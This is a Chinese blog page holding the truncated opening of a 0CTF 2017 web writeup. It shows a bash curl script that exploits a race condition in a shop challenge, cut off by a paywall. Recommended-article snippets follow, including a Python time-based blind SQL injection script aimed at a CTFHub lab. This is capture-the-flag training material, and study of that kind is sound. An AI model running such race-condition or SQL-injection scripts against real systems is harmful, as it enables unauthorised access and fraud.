Writeup for 0CTF2017 web

最新推荐文章于 2025-07-10 16:43:58 发布
最新推荐文章于 2025-07-10 16:43:58 发布 · 1.9k 阅读 · 1
文章标签:

#0CTF #Writeup

本文详细介绍了2017年0CTF中Temmo’s tinyshop挑战的解题过程,包括利用race condition漏洞增加用户余额、通过SQL注入获取flag等关键步骤。

2017年0CTF,WEB部分题目的Writeup。

Temmo’s tiny shop

本题首先要获取!HINT!,但是初始钱包里只有4000,而HINT要价8000,此处使用条件竞争(race condition)这一漏洞来提升wallet的数值。利用两个浏览器登录同一账号,使用两个COOKIE来同时进行售卖的动作,则会进行两次售卖动作。bash代码如下

#!/bin/bash
cookie1="PHPSESSID=m19tgi4tq3eptm53pss14dc910"
cookie2="PHPSESSID=39083e7nft6kbvkjvph29socb0"

url="http://202.120.7.197/app.php"

curl "$url?action=buy&id=2" -b $cookie1
curl "$url?action=sale&id=2" -b $cookie1 &
curl "$url?action=sale&
最低0.47元/天 解锁文章
ctf——writeup
Child_by_dream的博客
01-19 1218
ctf线上赛——第三关地址:http://106.75.86.18:2222提示:ip spoofing——ip伪造首先访问目标地址,一个正常的网页,挺文艺的。上面有些提示。根据上面的提示,我们浏览网页。找了好久,终于找到你。这个跳转链接。(在这个页面下方)我们接着点击这个链接,就跳转到administrator.php这个页面了。看到这个登录页面,就要知道用户名,密码,可是没有怎么办。一开始也试
CTF writeup
08-10
CTF writeup masterCTF write ups from the vulnhub CTF team
0CTF-2017-web-writeup
dengzhasong7076的博客
03-20 295
xss搞的很爽... complicated xss 题目描述:The flag is in http://admin.government.vip:8000 两个xss点。 1、http://government.vip/ 存储型xss,未做过滤,管理员会触发此xss 202.120.7.205 - - [20/Mar/2017:14:26:18 +0800] "GET /aaakkk...
0CTF-2016-Web-piapiapia
feng的博客
11-07 405
知识点 备份文件下载 PHP代码审计 数组绕过preg_match 反序列化字符逃逸 WP 首先进入环境,查看源代码,发现了备份文件: 然后下载下来,进行代码审计。审计完之后可以知道,flag是在config.php文件里,但是我们没法直接读取。唯一可以读取文件的就是profile.php里的这个: else { $profile = unserialize($profile); $phone = $profile['phone']; $email = $profile['email'];
BugkuCTF——最新webwriteup(持续更新)
1匹黑马
11-16 4463
文章目录web2计算器web基础$_GETweb基础$_POST矛盾web3域名解析你必须让他停下变量1 web2 打开页面后F12查看源代码即可。 flag:KEY{Web-2-bugKssNNikls9100} 计算器 这里做了输入长度限制,F12选中输入框,修改长度限制即可。 flag:flag{CTF-bugku-0032} web基础$_GET 这里要理解超全局变量$_GET,只要我们传递的参数为what,并且内容为flag,即可输出flag。 flag:flag{bugku_get_su8
N1 CTF 2025 web 复现
2301_79035389的博客
03-27 1349
在Linux里安装依赖遇到报错时,其实根本没必要到此ai或者搜,大多数时候它会给你解决方案,沉下心看看翻译跟着步骤走就解决了,包括脚本一定要在Linux环境里运行,window会报错,我用的是wsl,在window下开powshell后输wsl就可以了。看到这里调用了两次innerHTML进行html渲染,这里学到了一个新东西,html实体编码,即html的一些标签用其他的一些特定符号替换,那么浏览器在识别到这样的编码时,就不会将其当作html代码而渲染,将其还原为原本的惠html编码,举个例子。
ctf.show web 9-12 writeup
Sk1y的博客
02-17 1178
ctf.show web 9-12 writeup 目录 web9 解题过程 web10 解题过程 防护一: 防护二: 防护三: 两个小知识: group by with rollup web11 解题过程 删除session中的password web12 解题过程 web9 题目:ctf.show平台上的 解题过程 打开是个登录界面,没什么头绪 在index.phps中,源码泄露 <?php $flag=""; $pas..
ctf.show web 1-4 writeup
Sk1y的博客
02-17 636
web签到题 题目: ctf.show平台的,题目传送门 解题过程: 打开f12,看到一串编码 base64解码,即可得到flag.
CTF-writeup
03-19
CTF-writeup
ctf_writeup:来自 Balsn 的 CTF 文章
08-03
Balsn CTF 报道 Balsn 是来自台湾的 CTF 团队,成立于 2016 年。我们积极参与 CTF 比赛,并发表有关挑战的文章。 在我们的 GitHub 存储库中,这些文章采用 markdown + kaTeX 格式。 有关更多信息,请参阅。 目录 20200208-codegatectf2020quals 20191228-hxp36c3ctf 20191019-secconquals 20191012-hitconctfquals 20190928-pwnthybytesctf 20190928-bsidesdelhictf 20190921-dragonctfteaser 20190913-realworldctfqual 20190907-defcampctfqual 20190906-trendmicroctfqual 20190906-n1ct
CTF论坛练习平台密码学write up
dianzhao6995的博客
09-24 994
CTF论坛练习平台网址:http://123.206.31.85/challenges 1.滴答~滴 摩尔斯密码解密直接得到flag bkctfmisc,注意格式输入即可 2.聪明的小羊 栅栏解密,栅栏数2,解密得到 KEY{sad23jjdsa2} 3.ok 打开看到一串ook代码 这是一种编程语言,百度ook在线解密可得 flag{ok-ctf...
CTF题目的write up
cjf____的博客
06-19 818
星星还是那颗星星哟 月亮还是那个月亮 山也还是那座山哟 梁也还是那道梁 碾子是碾子 缸是缸哟 爹是爹来娘是娘 麻油灯呵还吱吱响 点的还是那么丁点亮 哦哦 注意:得到的 flag 请包上 flag{} 提交felhaagv{ewtehtehfilnakgw}下面的字符串解密后便能获得flag:ZmxhZ3tUSEVfRkxBR19PRl9USElTX1NUUklOR30= 注意:得到的 flag 请包上 flag{} 提交。注意:得到的 flag 请包上 flag{} 提交。
安恒CTF——Writeup
XXXXsssxwd的博客
07-10 405
【代码】安恒CTF——Writeup
CTF新生赛之Writeup
shikaku_的博客
11-27 7688
CTF新生赛之Writeup 作为零基础的新生,也是在开学后才了解了CTF,感觉本次新生赛中颇有收获,也是应赛制要求,故写下这份WP,以纪念本人的第一次CTF竞赛。 回顾和感想 Misc 我也不知道为什么我要写这个,我就写了签到题哈哈哈哈哈 过程是关注微信公众号SCUCTF,发送SCUx401CTF即可获得flag(不放图了) Web 因为是从Web入的门,所以先做的Web。这次新生赛做了六道题,都是非常简单的。因为看不懂PHP语言所以无法继续向前走了555, Crypto ...
世安杯CTF writeup
HBohan的博客
07-23 656
1 这都是基础 VkZad1dGSXdUbUZOZWs1T1YyeEdXVkl4Y0VWU01EVkxWbXhrV2xkVmVGVlVWa3BYVWpBd2VVMHdNVkJVYkVaWVUxWndWVlpGTVVkVk1HUk9WMVY0VlZSV1NsVlRSRWs1VUZRd1BRPT0= 一道base64+base64+base64+base32 即可解出 2 就是一个网页 查看源代码发现有注释 <!—coding mac > 想到苹果系统的DS_Store 然后源代码发现img标签s
记一次CTF过程(Writeup
热门推荐
_Ralph的博客
01-17 4万+
前言在i春秋平台看到几个ctf练习题,就点进去看看吧,能做就做不能做说明水平有限,还要继续加油(革命尚未成功,同志仍需努力)O(∩_∩)O哈哈~第一题:Robot题目名称:Robot有没有觉得这个题目很熟悉?没错robots.txt!很熟悉。可能解题思路就和robots.txt有关了。访问链接,网页显示位一张机器人的图片,没什么信息,网页源代码同样没有什么具有价值的信息。那我们就抓个包看看吧,用b
[CTF]WriteUp第1篇
poiiuytree233的博客
10-05 1010
[MRCTF2020]你传你🐎呢 [网鼎杯 2020 青龙组]AreUSerialz [CISCN2019 华北赛区 Day2 Web1]Hack World
CTFHub
最新发布
10-28
### CTFHub 简介 CTFHub 是一个面向网络安全爱好者和竞赛选手的在线平台,致力于提供 CTF(Capture The Flag)相关学习资源、靶场训练、赛事信息汇总以及技术交流服务[^1]。该平台整合了多种安全方向的知识,包括但不限于 Web 安全、逆向工程、Pwn、密码学、Misc(杂项)等,适合不同层次的安全研究人员进行技能提升。 ### 主要功能模块 - **靶场训练**:提供大量按难度分级的实战题目,涵盖 SQL 注入、文件上传、命令执行、反序列化、SSRF 等常见漏洞类型。 - **赛事聚合**:实时更新国内外各大 CTF 比赛的时间安排、报名方式与赛制说明,帮助用户规划参赛计划。 - **Writeup 分享**:社区成员可提交解题报告,便于赛后复盘与知识沉淀。 - **工具集推荐**:集成常用安全工具链接与使用指南,如 `Burp Suite`、`Ghidra`、`pwntools` 等。 ### 典型 Web 靶场示例(Python 脚本辅助) 在解决 CTFHub 提供的某些 Web 题目时,常需编写脚本自动化交互过程。例如,针对基于时间盲注的 SQLi 题目,可使用如下 Python 脚本探测数据库名: ```python import requests import time url = "http://challenge.ctfhub.com:8080/web/sqlinject/time/index.php" flag = "" for pos in range(1, 10): for c in range(32, 127): payload = f"' or if(ascii(substr(database(),{pos},1))={c},sleep(2),0) --+" data = {"param": payload} start_time = time.time() try: requests.post(url, data=data, timeout=10) except requests.exceptions.Timeout: continue end_time = time.time() if end_time - start_time >= 2: flag += chr(c) print(f"Found char: {chr(c)}, current flag: {flag}") break ``` 此脚本通过构造带有 `sleep()` 延迟的布尔条件判断,利用响应时间差异推断出当前数据库名称[^1]。 ### 社区与学习价值 CTFHub 不仅提供技术挑战环境,还促进了初学者与资深选手之间的知识传递。其结构化的训练路径有助于系统性掌握渗透测试与漏洞挖掘的核心技能,广泛被高校信息安全社团和企业红队培训所采用[^1]。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值